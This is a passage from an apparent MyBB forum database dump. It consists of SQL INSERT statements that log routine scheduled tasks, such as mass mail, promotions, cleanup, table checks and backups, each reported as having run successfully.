`mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13764', '9', '1351625580', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13765', '3', '1351625619', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13766', '9', '1351627240', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13767', '5', '1351627243', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13768', '3', '1351627327', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13769', '1', '1351627331', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13770', '7', '1351627336', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13771', '5', '1351627937', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13772', '9', '1351628176', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13773', '5', '1351629122', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13774', '9', '1351629134', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13775', '3', '1351629621', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13776', '9', '1351629639', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13777', '5', '1351630051', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13778', '9', '1351631433', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13779', '3', '1351631441', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13780', '1', '1351631493', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13781', '7', '1351631517', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13782', '5', '1351631854', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13783', '5', '1351632742', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13784', '9', '1351632775', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13785', '3', '1351632788', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13786', '9', '1351633870', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13787', '5', '1351633989', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13788', '9', '1351634122', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13789', '3', '1351634388', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13790', '1', '1351634849', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13791', '7', '1351634854', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13792', '5', '1351634863', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13793', '9', '1351635583', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13794', '5', '1351635994', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13795', '9', '1351636003', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13796', '3', '1351636244', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13797', '9', '1351638507', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13798', '5', '1351638531', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13799', '3', '1351638537', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13800', '1', '1351638547', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13801', '7', '1351638549', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13802', '9', '1351638757', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13803', '5', '1351640415', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13804', '9', '1351640424', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13805', '3', '1351640427', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13806', '5', '1351641149', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13807', '9', '1351641714', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13808', '3', '1351641751', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13809', '1', '1351641754', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13810', '2', '1351641780', 'The daily cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13811', '7', '1351641796', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13812', '11', '1351641816', 'The delayed moderation task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13813', '5', '1351641932', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13814', '9', '1351642232', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13815', '5', '1351643110', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13816', '9', '1351643153', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13817', '3', '1351646297', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13818', '9', '1351646947', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13819', '5', '1351646949', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13820', '1', '1351647242', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13821', '7', '1351647318', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13822', '3', '1351647332', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13823', '9', '1351647917', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13824', '5', '1351647930', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13825', '9', '1351648629', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13826', '3', '1351648854', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13827', '1', '1351648870', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13828', '7', '1351648873', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13829', '5', '1351649124', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13830', '9', '1351650258', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13831', '5', '1351650498', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13832', '9', '1351650639', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13833', '3', '1351651169', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13834', '9', '1351651562', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13835', '5', '1351651567', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13836', '9', '1351652173', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13837', '3', '1351652342', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13838', '1', '1351652649', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13839', '7', '1351652656', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13840', '5', '1351652717', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13841', '9', '1351653101', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13842', '5', '1351654612', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13843', '9', '1351654689', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13844', '3', '1351654699', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13845', '9', '1351654915', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13846', '5', '1351655124', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13847', '9', '1351655829', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13848', '3', '1351656027', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13849', '1', '1351656064', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13850', '7', '1351656072', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13851', '5', '1351656416', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13852', '9', '1351656654', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13853', '5', '1351657504', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13854', '9', '1351657530', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13855', '3', '1351657805', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13856', '9', '1351658548', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13857', '5', '1351658790', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13858', '9', '1351659327', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13859', '3', '1351659546', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13860', '1', '1351659658', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13861', '7', '1351659680', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13862', '5', '1351660195', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13863', '9', '1351660220', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13864', '5', '1351661524', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13865', '9', '1351661822', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13866', '3', '1351662103', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13867', '9', '1351662219', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13868', '5', '1351662408', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13869', '9', '1351663191', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13870', '3', '1351663213', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13871', '1', '1351663304', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13872', '7', '1351663315', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13873', '5', '1351663679', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13874', '9', '1351664932', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13875', '5', '1351664986', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13876', '3', '1351665135', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13877', '9', '1351667941', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13878', '5', '1351667960', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13879', '3', '1351667970', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13880', '1', '1351667971', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13881', '7', '1351667975', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13882', '5', '1351668315', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13883', '9', '1351668334', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13884', '3', '1351668636', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13885', '9', '1351669220', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13886', '5', '1351680677', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13887', '9', '1351680775', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13888', '3', '1351680784', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13889', '1', '1351680795', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13890', '7', '1351680920', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13891', '9', '1351684094', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13892', '3', '1351684186', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13893', '1', '1351684197', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13894', '7', '1351684243', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13895', '5', '1351684244', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13896', '9', '1351684520', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13897', '3', '1351684859', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13898', '1', '1351684879', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13899', '4', '1351684895', 'The database backup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13900', '7', '1351684901', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13901', '5', '1351685904', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13902', '9', '1351685911', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13903', '5', '1351686319', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13904', '9', '1351686576', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13905', '3', '1351686642', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13906', '9', '1351688764', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13907', '5', '1351691322', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13908', '3', '1351691614', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13909', '1', '1351691620', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13910', '7', '1351691626', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13911', '9', '1351691880', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13912', '3', '1351692357', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13913', '1', '1351692405', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13914', '7', '1351692485', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13915', '5', '1351692532', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13916', '9', '1351692631', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13917', '5', '1351694732', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13918', '9', '1351695182', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13919', '3', '1351695220', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13920', '9', '1351695473', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13921', '3', '1351696242', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13922', '1', '1351696295', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13923', '7', '1351696301', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13924', '5', '1351696309', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13925', '9', '1351696315', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13926', '5', '1351697101', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13927', '9', '1351697119', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13928', '3', '1351697403', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13929', '9', '1351698022', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13930', '5', '1351699605', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13931', '9', '1351699673', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13932', '3', '1351699677', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13933', '1', '1351700199', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13934', '7', '1351700360', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13935', '9', '1351700384', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13936', '5', '1351700702', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13937', '9', '1351700721', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13938', '3', '1351701033', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13939', '9', '1351703083', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13940', '5', '1351703719', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13941', '3', '1351703734', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13942', '1', '1351703739', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13943', '7', '1351703745', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13944', '9', '1351704150', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13945', '5', '1351704752', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13946', '9', '1351704811', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13947', '3', '1351704819', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13948', '9', '1351705858', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13949', '5', '1351705870', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13950', '9', '1351706628', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13951', '3', '1351707970', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13952', '1', '1351707998', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13953', '7', '1351708016', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13954', '5', '1351708026', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13955', '9', '1351708299', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13956', '3', '1351708345', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13957', '9', '1351708817', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13958', '5', '1351709604', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13959', '9', '1351709915', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13960', '3', '1351709956', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13961', '1', '1351710001', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13962', '7', '1351710005', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13963', '5', '1351710359', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13964', '9', '1351711339', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13965', '5', '1351713163', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13966', '9', '1351713397', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13967', '3', '1351713399', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13968', '3', '1351713894', 'The user cleanup task successfully ran.'); INSERT INTO 